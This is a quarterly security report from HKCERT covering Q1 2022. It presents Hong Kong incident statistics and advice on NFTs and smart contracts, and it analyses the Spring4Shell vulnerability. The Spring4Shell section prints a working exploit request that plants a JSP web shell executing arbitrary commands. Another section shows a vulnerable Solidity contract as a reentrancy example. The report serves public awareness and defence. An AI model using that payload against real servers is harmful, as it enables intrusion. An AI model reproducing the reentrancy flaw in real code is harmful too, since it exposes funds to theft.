Hong Kong Security Watch Report (Q1 2022)

Release Date: 27 Apr 2022 2182 Views

HKCERT is pleased to bring to you the "Hong Kong Security Watch Report" for the first quarter of 2022.

Nowadays, many networked digital devices, such as computers, smartphones, tablets, are being compromised without the user’s knowledge. The data on them may be mined and exposed every day, and even be used for various criminal activities.

The Hong Kong Security Watch Report aims to raise public awareness of the problem of compromised systems in Hong Kong, enabling them to make better decision in information security. The data in this quarterly report focuses on the activities of compromised systems in Hong Kong which suﬀer from, or have participated in various types of cyber attacks, including web defacement, phishing, malware hosting, botnet command and control (C&C) centres or bots (Table 1). “Computers in Hong Kong” refer to those whose network geolocation is Hong Kong, or the top level domain of their host name is “.hk”. Also, this report will review major security incidents and explore hot security topics with easy-to-adopt security advice with an aim to improve public’s information security posture and enhance their security resilience capabilities.

Highlight of the 2022 Q1 Report

Unique security events related to Hong Kong
4,527

Quarter-to-quarter
-4.8%

Trend and distribution of server related security events

Event Type	2021 Q1	2021 Q2	2021 Q3	2021 Q4	2022 Q1	quarter-to-quarter
Defacement	295	476	445	595	718	+21%
Phishing	495	665	993	1,061	806	-24%
Malware Hosting	0	8	0	0	0	-
Botnet (Bots)	4,227	6,042	3,422	3,097	3,003	-3%
Botnet (C&C Centres)	0	0	0	0	0	-
Total	5,017	7,191	4,860	4,753	4,527	-4.8%

Major Botnet Families in Hong Kong Network

Avalanche	304	-25.7%
Conficker	244	-10.6%
Tinba	105	+23.5%
Virut	105	-13.9%
Nymaim	73	-62.6%
VPNFilter	54	-10%
Zeus	44	-8.3%
Bankpatch	38	+5.6%

Major Botnet Families in Hong Kong Network

* Individual botnet’s size is calculated from the maximum of the daily counts of unique IP address attempting to connect to the botnet in the reporting period. In other words, the real botnet size should be larger because not all bots are activated on the same day.

Most Defacement Events are due to Unpatched Vulnerabilities by IT Administrators

There were 718 defacement events in 2022 Q1. 325 of them were related to systems with known vulnerabilities. Others included file inclusion and server intrusion, etc.

The OWASP Top 10:2021 was released in Sep 2021. Among the top 10 common issues, the use of vulnerable and outdated components came sixth.

According to a survey from a security organisaton, nearly 1,500 security vulnerabilities were found in the most popular content management system WordPress in 2021, up 150% from 2020. (Source: https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/)

Another cause of compromised systems is that developers accidentally download and install malicious third party dependencies. In Mar 2022, over 600 malicious Nodes Package Manager (NPM) packages were found as Typosquatting and Dependency confusion were used to trick developers into installing the packages on their own systems.

HKCERT has published a blog “Beware of Malicious or Vulnerable Third Party Dependencies” which recommended developers to establish a security and vulnerability management policy, integrate a secure software development framework into the software development life cycle, and only download third-party dependencies from official repository, etc. For more information, you can click the picture link on the left.

Focus: Learn More About NFT Cyber Attacks and Take a Multi-Pronged Approach for Secure Transactions

A Non-Fungible Token (NFT) can be regarded as analogous to certificate of ownership, which represents the asset owned by a person. Recently several NFT related cyber incidents happened, include the phishing websites of Monkey kingdom and NFT marketplace OpernSea in Dec 2021 and Feb 2022 respectively, also the NFT torts between Nike and StockX.

NFT is an ownership record stored on the blockchain, which only accounts for the last part of the entire ecosystem. The entire ecosystem is first initiated by creators, who create digital works. Then, sellers and buyers will auction and trade their favourites on the NFT platform. After the buyer signs the transaction, the platform will write the transaction record into the blockchain, including the transfer of amount and the ownership of the artwork.

Ecosystem of NFT and 3 Common Attacks

Original source: Understanding Security Issues in the NFT Ecosystem, November 2021, University of California, Santa Barbara (https://www.researchgate.net/profile/Dipanjan-Das-6/publication/356339205_Understanding_Security_Issues_in_the_NFT_Ecosystem/links/61e78b519a753545e2df265a/Understanding-Security-Issues-in-the-NFT-Ecosystem.pdf )

Most of the attacks are targeting the users and the NFT platform. They can be classified into the following three categories:

1. Phishing

Stealing recovery phrase of crypto wallet

A hacker sends a fake website link via email, text message or Discord. The fake website has the same layout as the real crypto wallet site and asks the wallet user for the recovery phrase. The hacker obtains the phrase and has full control over the cryptocurrency in the encrypted wallet. In addition to fake websites, other methods include impersonating technical support personnel to offer assistance but actually aiming to trick for the phrases.

A fake transaction message transfers wallet asset

The fake platform will pop up a transaction message to request the victim to connect the wallet, sign and confirm the transaction. But the transaction is actually to transfer assets to the hacker’s account.

2. Security Vulnerability in NFT Platform

A NFT platform, which is developed and operated by the vendor, operates similar to that of an online shopping platform. There are many popular NFT platforms on the Internet, and vulnerabilities are usually caused by insufficient security consideration during the design and development phrases. Such vulnerabilities become the hackers’ targets. For example, a hacker can upload artworks containing malicious code, hack into accounts without two-factor authentication, or trade NFTs at low prices and resell them for profit through security design flaws.

3. Counterfeit or infringement of NFT artwork

Most of the NFT artworks are pictures, and the hot sale of NFTs also attracts plagiarists to “steal pictures” and sell them on other platforms.

At present, there are no regulations around the world to govern the trading of NFTs, and there is a general belief that NFTs only represent the ownership of assets but not the copyright. The unclear rights of NFT owners and the difficulty in pursuing them cause mental distress and monetary losses to those who have purchased counterfeit or infringing NFTs.

How to trade NFTs securely

Do not click any links or attachments in emails, text messages or social media from unknown sender
Use the browser bookmark function to store the NFT platform URL
Avoid using links sent by others to log in to the platform
Enable two-factor or multi-factor authentication
Never disclose your wallet’s recovery phrase to a third party
Set up a temporary wallet and only store a suitable amount of cryptocurrency for trading
Carefully verify all information before signing any smart contract, understand the terms and potential risks
Review the permission which is granted to access your NFT and revoke past authorisation for uncertain purpose
Conduct sufficient research before purchasing NFT. Verify the identity of the designer, and check whether information of the NFT is complete (for instance, users’ reviews, past transactions, whether it is an original work, etc.)
- If the platform has a mechanism for removing infringing NFTs, users can check with the corresponding system administrator

HKCERT published two security blogs about the security of crypto wallet and NFT for reference.

https://www.hkcert.org/tag?q=NFT

Focus: Secure Use of Smart Contracts to Protect Interest and Save Cost

Smart contract is a program stored in the blockchain. Unlike traditional contracts, it does not require third-party intervention. When the contract conditions are met, the program will automatically execute the contract and it cannot be changed. In the past, there were some smart contract-related attacks that involved exploiting the vulnerabilities in smart contracts. Hence, when developing or using smart contracts, users must pay attention to avoid program execution results that are different from expectations, and understand the potential risks involved and the corresponding security recommendations.

The concept of smart contract was first floated in 1994 by an American cryptographer and computer scientist Nick Szabo, a scholar who advocated the digitisation and stylisation of contracts in which the terms and conditions could be digitally embedded in a specific area. However, the concept did not draw significant response until the emergence of blockchain.

Differences between traditional contracts and smart contracts

In daily life, we often come into contact with traditional contracts. For example, when buying a house, we need to go through procedures such as signing a contact with the real estate agents, bank mortgage approval, and legal services.
Traditional contracts are often based on trust, involving the intervention of a third party as a witness, and then both signed parties perform their contractual obligations. The whole process is complicated and involves additional costs.
The design of smart contracts is to solve the above problems. In addition to saving costs for third parties, it also ensures that the contract content is effectively executed. This is because it is a technology developed not based on mutual trust, but on the content of the contract agreed by both parties.
Since the smart contract is programmed and written into the blockchain, the blockchain has the characteristics that it cannot be tampered with. Also, once the conditions defined by the smart contract are met, the content will be executed immediately and automatically, protecting the interests of both parties and saving time and cost.

Smart contracts have the following characteristics:

Automation: Execute automatically when the conditions are met.
Save time and cost: Reduce the involvement of third parties, thereby reducing the costs involved, such as time costs and third-party expenses.
Reliability: The content is written into the blockchain. Therefore, it is based on the content of the contract, not the trust of both parties.

Past cyber security incidents involving smart contracts

Smart contracts are written in programming language and executed by the Ethereum Virtual Machine. Many security incidents are caused by hackers finding vulnerability in the programs.

Example 1: Incorrect settings and code bug

Hacker used the emergencyWithdraw function in the figure below to steal 57 times from the smart contract

Source: https://research.checkpoint.com/2022/scammers-are-creating-new-fraudulent-crypto-tokens-and-misconfiguring-smart-contracts-to-steal-funds/

Example 2: Reentrancy Attack

Calling the external code via msg.sender.call.value(amountToWithdraw)(""), userBalances[msg.sender] is not reset to zero first. If the external is a malicious program, it can then call withdrawBalance() repeatedly to transfer assets equal to the value of userBalances[msg.sender].

mapping (address => uint) private userBalances;

function withdrawBalance() public {
    uint amountToWithdraw = userBalances[msg.sender];
    (bool success, ) = msg.sender.call.value(amountToWithdraw)(""); // At this point, the caller's code is executed, and can call withdrawBalance again
    require(success);
    userBalances[msg.sender] = 0;
}

"Reentrancy" attack example: https://consensys.github.io/smart-contract-best-practices/attacks/reentrancy/

Notes on using smart contracts

When signing a smart contract, review the contract content carefully. If unsure about signing the request, use official channels to contact the platform’s technical support
If not too familiar with smart contracts, use the official smart contracts on the trading platform or marketplace for transactions
After the transaction, check the crypto asset immediately to ensure the amount of assets transferred is correct and the transaction has been settled in accordance with the smart contract
When writing smart contracts, please refer to the best practice guidelines to avoid common attack methods, such as reentrancy, denial of service attacks, etc.
Conduct security assessment or auditing against smart contracts to examine the code for security issues. The result could also be shared to users for transparency

Cyber Attack: Spring4Shell Vulnerability Leads to Remote Code Execution

In December 2021, Log4J – a java-based logging utility reported a severe vulnerability log4Shell, which can be exploited by hackers to trigger remote code execution (RCE). Three months later, similar vulnerabilities showed up in another popular Java Framework - Spring Framework. As a result, it was named Spring4Shell and assigned the Common Vulnerabilities and Exposures (CVE) number of CVE-2022-22965, with a Common Vulnerability Scoring System (CVSS) score of 9.8 (10 being the maximum).

What is Sping4Shell (CVE-2022-22965)?

It was the name of the severe vulnerability found in Spring Framework in March 2022. The Spring framework is one of the most widely used open-sourced framework in Java. In Java Development Kit (JDK) 9.0 or higher, hackers can exploit the vulnerability and access the Tomcat AccessLogValve objects, by using a malicious URI to trigger the pipeline mechanism and create a web shell if certain conditions are met.

The difference between Log4Shell and Spring4Shell

Log4Shell affects all systems that use this popular utility which cover a vast number. Also, the exploitation method is relatively simple and does not require much technical knowledge.

On the other hand, the Spring4Shell vulnerability needs to be exploited under a particular server setting. It requires a sound programming skills and understanding of the inner workings of different server components. Therefore the scale of impact may not be as serious as the log4Shell. However, as the proof of concept code is available online, HKCERT had rated it as “High Risk” (https://www.hkcert.org/security-bulletin/spring-framework-remote-code-execution-vulnerability_20220401).

Vulnerable server

Running on JDK 9 or higher
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions
Apache Tomcat as Servlet Container
- Packaged as traditional WAR
- spring-webmvc or spring-webflux dependency

Exploit analysis

The vulnerability is due to the Spring's getCachedIntrospectionResults method receiving a HTTP request to trigger the accessor chaining of Java object to access the AccessLogValve object in Tomcat. The object is used by Tomcat for logging. Hackers can then manipulate the properties of Tomcat AccessLogvalve through HTTP request, and change the various configurations of the log, for example, writing the malicious code to the log and then executing it.

Stage

Send HTTP POST to the affected servers, including the following Header and Data to modify the pattern, suffix, directory, prefix, and fileDataFormat configurations of Tomcat logs

Header

“c1”: “Runtime”,
“c2”: “<%”,
“suffix”: “%>//”

Data

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

The above request will cause Spring to create a web shell with the name Tomcatwar.jsp under the WebApps/Root directory. The web shell can accept commands sent by the hacker and display the result

Exploit in the Wild

Log4J graph — Source: https://blog.checkpoint.com/2022/04/05/16-of-organizations-worldwide-impacted-by-spring4shell-zero-day-vulnerability-exploitation-attempts-since-outbreak/

Before the official patch was released, the proof of concept code was already disclosed on Github. Although the related information is removed quickly, it had been reproduced in various social media platforms, meaning that it might be leveraged by hacker. Microsoft reported that it detected active exploitation in its cloud service Azure after the vulnerability was announced. Another cyber security company had also detected more than 37,000 attacks as of April 3, 2022.